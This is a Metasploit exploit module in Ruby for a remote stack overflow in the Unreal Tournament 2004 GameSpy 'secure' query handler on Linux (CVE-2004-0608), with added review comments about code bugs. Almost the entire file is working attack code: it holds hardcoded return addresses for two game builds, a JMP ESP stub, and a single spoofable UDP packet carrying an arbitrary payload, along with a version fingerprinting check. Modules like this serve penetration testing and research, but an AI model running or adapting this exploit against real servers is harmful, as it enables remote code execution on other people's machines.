##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
# Exploit module for the GameSpy "secure" query handler of Unreal Tournament
# 2004 on Linux (CVE-2004-0608).  The whole interaction is a single UDP
# datagram to RPORT (default 7787); `check` fingerprints the server by the
# game version it reports before anything else is sent.
#
# NOTE(review): neither `exploit` nor `ut_version` wraps its socket work in
# `ensure`, so an exception raised between connect_udp and disconnect_udp
# leaves the UDP socket open — consider `begin ... ensure disconnect_udp end`.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  # Registers the module metadata (name, references, payload constraints,
  # targets) and the single RPORT option.
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
      'Description'    => %q{
          This is an exploit for the GameSpy secure query in
          the Unreal Engine.

          This exploit only requires one UDP packet, which can
          be both spoofed and sent to a broadcast address.
          Usually, the GameSpy query server listens on port 7787,
          but you can manually specify the port as well.

          The RunServer.sh script will automatically restart the
          server upon a crash, giving us the ability to
          bruteforce the service and exploit it multiple
          times.
      },
      'Author'         => [ 'onetwo' ],
      'License'        => BSD_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2004-0608'],
          [ 'OSVDB', '7217'],
          [ 'BID', '10570'],

        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 512,
          # Bytes the encoder must avoid: 0x5c (backslash, the key delimiter
          # used in the "\\secure\\" query sent by exploit) and 0x00.
          'BadChars' => "\x5c\x00",

        },
      'Platform'       => 'linux',
      'Targets'        =>
        [
          # Each target carries two addresses; the original comment labels
          # Rets[0] as the JMP ESP and Rets[1] as the BSS pointer.
          ['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer
          ['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
        ],
      'DisclosureDate' => 'Jun 18 2004'))

    register_options(
      [
        Opt::RPORT(7787)
      ], self.class)
  end

  # Builds the "\\secure\\" datagram and sends it once.  The buffer length is
  # never changed after make_nops, so every datagram this module emits is
  # exactly 1024 bytes to RPORT and begins with "\\secure\\" — a usable
  # signature for network detection.
  def exploit
    connect_udp

    buf = make_nops(1024)
    # Target-specific addresses are written at fixed offsets; pack('V') is
    # little-endian 32-bit.
    buf[24, 4] = [target['Rets'][1]].pack('V')
    buf[44, 4] = [target['Rets'][0]].pack('V')
    buf[56, 4] = [target['Rets'][1]].pack('V')
    buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP

    # Query key goes at the front; the encoded payload (at most 512 bytes,
    # per 'Space') overwrites the tail of the buffer.
    buf[0, 8] = "\\secure\\"
    buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded

    udp_sock.put(buf)

    handler
    disconnect_udp
  end

  # Queries the server with "\\basic\\" and extracts the reported gamever.
  #
  # @return [String, nil] the 1–5 digit version string, or nil when no
  #   \gamever\ key was found in the reply
  def ut_version
    connect_udp
    udp_sock.put("\\basic\\")
    res = udp_sock.recvfrom(8192)
    disconnect_udp

    # NOTE(review): Rex::Socket::Udp#recvfrom returns [data, host, port] in
    # the versions I know; if that holds here, `res.match` raises
    # NoMethodError on Array and `check` never reaches its version logic —
    # confirm against the Rex in use and match on res[0] if so.
    if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
      return m[1]
    end

    return
  end

  # Fingerprints the server by reported version: Appears for the builds in
  # the first regex, Detected for a four-character version starting with 2
  # (reported as UT2003), Safe otherwise; nil when no server answered.
  #
  # NOTE(review): 3204 is treated as exploitable here but has no entry in
  # 'Targets' above, so check and the target list disagree for that build.
  #
  # @return [Exploit::CheckCode, nil]
  def check
    vers = ut_version

    if (not vers)
      print_status("Could not detect Unreal Tournament Server")
      return
    end

    print_status("Detected Unreal Tournament Server Version: #{vers}")
    # ^/$ instead of \A/\z is harmless here only because ut_version's capture
    # is digits-only and cannot contain a newline.
    if (vers =~ /^(3120|3186|3204)$/)
      print_status("This system appears to be exploitable")
      return Exploit::CheckCode::Appears
    end


    if (vers =~ /^(2...)$/)
      print_status("This system appears to be running UT2003")
      return Exploit::CheckCode::Detected
    end

    print_status("This system appears to be patched")
    return Exploit::CheckCode::Safe
  end

end